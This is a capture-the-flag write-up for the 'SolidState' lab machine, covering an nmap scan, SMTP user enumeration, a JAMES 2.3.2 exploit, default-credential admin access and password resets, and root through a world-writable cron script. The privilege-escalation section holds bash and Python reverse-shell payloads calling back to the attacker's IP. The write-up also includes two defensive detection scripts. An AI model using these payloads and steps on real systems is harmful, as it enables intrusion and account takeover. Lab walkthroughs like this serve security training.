# ENUMERATION
## NMAP
The scan returned multiple interesting services:

```bash
# nmap -p- -sV -sC -o solidstate.txt --script vuln 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:47 EDT
Nmap scan report for 10.10.10.51
Host is up (0.050s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.51:80/
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/index.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/services.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/about.html
| Form id: name
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /README.txt: Interesting, a readme.
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|_http-server-header: Apache/2.4.25 (Debian)
| http-sql-injection:
| Possible sqli for queries:
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/ie/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|_ http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp open pop3 JAMES pop3d 2.3.2
|_sslv2-drown:
119/tcp open nntp JAMES nntpd (posting ok)
|_sslv2-drown:
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## Port 25 SMTP
We have an SMTP service running. This [VRFY EXPN RCPT - pentest monkey](https://www.ndchost.com/wiki/mail/test-smtp-auth-telnet) page explains how we can connect to the SMTP service on port 25 and test which user-enumeration commands it accepts.

```bash
# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 06:22:00 -0400 (EDT)
VRFY
502 5.3.3 VRFY is not supported
EXPN
502 5.3.3 EXPN is not supported
RCPT
503 5.5.0 Need MAIL before RCPT
```
Since the service does not support the first two commands, we're going to use RCPT.

```bash
$ /usr/share/legion/scripts/smtp-user-enum.pl -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Apr 15 06:23:54 2021 #########
######## Scan completed at Thu Apr 15 06:24:02 2021 #########
0 results.
168 queries in 8 seconds (21.0 queries / sec)
```
I have also tried enumerating email addresses by adding "-D 10.10.10.51" and "-D solid-state-security.com", but again with no success.
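From the server side, the RCPT probe above looks like one client hammering the mail server with a wordlist of recipients in a few seconds, most of them rejected. The following detector is an added example (not part of the write-up and not from the smtp-user-enum tool): it slides a time window over a simplified, constructed log format and flags clients whose RCPT activity matches that pattern. The log format, the thresholds and the `find_rcpt_enumeration` name are assumptions for illustration; a real deployment would adapt the parser to the mail server's actual log lines.

```python
"""Detect SMTP recipient-enumeration bursts in mail-server logs.

Added example for the write-up, not code from it. It flags a client that
issues many RCPT TO commands for distinct, mostly rejected addresses within
a short window, which is what a wordlist-driven RCPT probe looks like from
the server side. The log format below is constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines: "<ISO timestamp> <client-ip> RCPT <address> <SMTP reply code>".
# The first client mirrors the scan above; the second is ordinary traffic.
SAMPLE_LOG = """\
2021-04-15T06:23:54 10.10.14.5 RCPT root@localhost 550
2021-04-15T06:23:54 10.10.14.5 RCPT bin@localhost 550
2021-04-15T06:23:55 10.10.14.5 RCPT daemon@localhost 550
2021-04-15T06:23:55 10.10.14.5 RCPT adm@localhost 550
2021-04-15T06:23:56 10.10.14.5 RCPT lp@localhost 550
2021-04-15T06:23:56 10.10.14.5 RCPT sync@localhost 550
2021-04-15T06:23:57 10.10.14.5 RCPT mindy@localhost 250
2021-04-15T06:30:00 10.10.14.9 RCPT john@localhost 250
2021-04-15T06:31:00 10.10.14.9 RCPT thomas@localhost 250
"""

LINE_RE = re.compile(r"^(\S+) (\S+) RCPT (\S+) (\d{3})$")


def parse_line(line):
    """Return (timestamp, client_ip, recipient, reply_code) or None for unparseable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), int(m.group(4))


def find_rcpt_enumeration(log_text, window=timedelta(seconds=60),
                          min_distinct=5, min_reject_ratio=0.5):
    """Return {client_ip: (distinct_recipients, rejected_count)} for clients that,
    in any window of the given length, tried at least min_distinct different
    recipients with at least min_reject_ratio of the attempts rejected (5xx).
    """
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ts, ip, addr, code = parsed
            events[ip].append((ts, addr, code))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()  # chronological order so the sliding window is contiguous
        best = None
        start = 0
        for end in range(len(evs)):
            # Advance the window start until it spans no more than `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            distinct = {addr for _, addr, _ in win}
            rejected = sum(1 for _, _, code in win if 500 <= code < 600)
            if len(distinct) >= min_distinct and rejected / len(win) >= min_reject_ratio:
                # Keep the widest matching window per client for the report.
                if best is None or len(distinct) > best[0]:
                    best = (len(distinct), rejected)
        if best:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, (distinct, rejected) in find_rcpt_enumeration(SAMPLE_LOG).items():
        print("possible RCPT enumeration from %s: %d recipients, %d rejected" % (ip, distinct, rejected))
```

Rate alone is a weak signal (a legitimate bulk sender also issues many RCPT commands), which is why the check combines distinct recipients with the rejection ratio; a server that rejects unknown users with 550, as JAMES does here, produces exactly that mix during a wordlist run.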
## Port 80 HTTP
The nmap scan reveals a web service. Let's try to find hidden directories and files. The scan already reported some possibly interesting directories; however, upon checking them I did not find anything important.
#### Dirbuster
![[solidstate dirbuster.PNG]]
#### sqlmap
I tested the reported sqli under /assets/js/ just for the sake of it, and confirmed that it is a false positive: the parameter is not injectable.
## Port 4555 JAMES Remote Admin
#### Searchsploit
We can't help but notice that two of the exploits target exactly the version running on the machine (2.3.2).

```bash
# searchsploit JAMES
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow | windows/remote/944.c
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

The following picture is from the RCE Python exploit. It seems the default credentials are root:root. Let's test it:
# Exploitation
![[Pasted image 20210415135840.png]]
```bash
$ python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
```
Now, in order to execute the payload, we need to find a way to log in to the machine. The JAMES Remote Administration service is running on port 4555 and we know the default credentials root:root:

```bash
$ telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mailadmin mailadmin
Password for mailadmin reset
exit
Unknown command exit
quit
Bye
Connection closed by foreign host.
```
Cool: I logged on to the service with the default credentials, we now know which users exist, and we were able to change passwords. Next I am going to access the mailadmin account, since it looks like the juiciest one.
1. Credentials: mailadmin:mailadmin
![[Pasted image 20210415214145.png]]
2. A dialog will warn that the connection uses plain text rather than encryption. Confirm and continue.
3. Ok, apparently the mailadmin account was a waste of time, lol :D. Let's repeat the process for the rest of the accounts (click "set up another account") and hope we get something out of it.
```bash
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mindy mindy
Password for mindy reset
```
4. Mindy's account contains a welcome email and an access email; the latter contains a password.
![[Pasted image 20210415214939.png]]
Ok, so upon logging in through SSH with the credentials mindy:P@55W0rd1!2@, the Python exploit's payload runs and a bash_completion file is created. However, we're put in an rbash (restricted) shell.

```bash
$ ssh mindy@10.10.10.51
Received: from 10.10.14.5([10.10.14.5])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 902
for <../../../../../../../../etc/bash_completion.d@localhost>;
Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
Date: Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
From: [email protected]
$ whoami
-rbash: whoami: command not found
```
I finally managed to escape the restricted shell by adding "-t bash" to the ssh command.
```bash
$ man ssh
[...]
-t Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.
[...]
```

```bash
ssh mindy@10.10.10.51 -t bash
mindy@10.10.10.51's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
bin user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
```
# Privilege escalation
#### Enumeration
```bash
$ bash linenum.sh > output.txt
```

I did not manage to find anything interesting apart from some system ports that are open. The next script I'd like to try is probably unix-privesc-check from [pentestmonkey](http://pentestmonkey.net/tools/audit/unix-privesc-check); however, the box does not have `strings`, which that script requires in order to run.
#### Writable files/directories

```bash
$ find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
```
NICE! We have a root-owned, world-writable file that we can modify. Let's escalate. First, I tried to get a reverse shell:

```bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ls
newfile.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cd opt
bash: cd: opt: No such file or directory
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cd /opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ nano tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ date
Thu Apr 15 16:04:56 EDT 2021
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('bash -c "sh -i >& /dev/udp/10.10.14.5/1234 0>&1"')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ date
Thu Apr 15 16:05:13 EDT 2021
```
I proved to myself that cron executes the file every minute by writing the following into tmp.py:

```python
#!/usr/bin/env python
import os
import sys
try:
    os.system('touch /tmp/shell.py;python shell.py')
except:
    sys.exit()
```
After a while, a file was created in /tmp/.
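What made this escalation possible is the combination found above: a job that cron runs as root, pointing at a script that any user can edit. The following audit is an added example (not part of the write-up and not a known tool): it parses `/etc/crontab`-style lines (five time fields, a user field, then the command), extracts the absolute paths each job runs, and reports any that are writable by group or others. The sample crontab is constructed, and the `path_prefix` parameter exists only so the demo can create its files in a temporary directory instead of touching `/opt`.

```python
"""Audit cron entries for scripts that other users can modify.

Added example, not from the write-up: the box ran /opt/tmp.py from cron as
root while the file was mode 777, so any local user could change what root
executes. The crontab text below is constructed and the files are created
in a temporary directory so the example runs anywhere.
"""
import os
import re
import stat
import tempfile

# /etc/crontab format: five time fields, the user to run as, then the command.
CRON_LINE_RE = re.compile(r"^\s*(?:[^\s#]+\s+){5}(\S+)\s+(.*)$")

# Constructed sample: one job runs a world-writable script, the other a properly protected one.
SAMPLE_CRONTAB = """\
# constructed /etc/crontab-style entries
SHELL=/bin/sh
* * * * * root /opt/tmp.py
0 3 * * * root /opt/backup.sh
"""


def script_paths(command):
    """Absolute paths mentioned in a cron command (interpreter and script alike)."""
    return [tok for tok in command.split() if tok.startswith("/")]


def audit_crontab(crontab_text, path_prefix=""):
    """Return a list of (job_user, path, reason) for risky entries.

    path_prefix is prepended to every path so the demo can inspect a
    temporary tree; leave it empty to audit the live filesystem.
    """
    findings = []
    for line in crontab_text.splitlines():
        m = CRON_LINE_RE.match(line)
        if not m:
            continue  # comments, environment assignments, blank lines
        user, command = m.group(1), m.group(2)
        for p in script_paths(command):
            real = path_prefix + p
            try:
                st = os.stat(real)
            except FileNotFoundError:
                findings.append((user, p, "missing"))
                continue
            # Group- or other-writable: someone other than the owner can change what runs.
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((user, p, "writable by group/others"))
    return findings


def demo():
    """Build a throwaway /opt with the two scripts and audit the sample crontab against it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "opt"))
        for name, mode in (("tmp.py", 0o777), ("backup.sh", 0o755)):
            path = os.path.join(tmp, "opt", name)
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(path, mode)
        return audit_crontab(SAMPLE_CRONTAB, path_prefix=tmp)


if __name__ == "__main__":
    for user, path, reason in demo():
        print("cron job as %s runs %s: %s" % (user, path, reason))
```

A "missing" finding is worth reporting too: a job whose target does not exist yet lets anyone who can create that path decide what root runs, which is the same class of problem as the writable file.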
I then edited the file with the Python script from the [reverse shell sentrywhale](https://sentrywhale.com/documentation/reverse-shell) website:

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.5",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```
Catch the shell:

```bash
$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 39694
bash: cannot set terminal process group (3597): Inappropriate ioctl for device
bash: no job control in this shell
root@solidstate:~# ls
ls
file.py
root.txt
```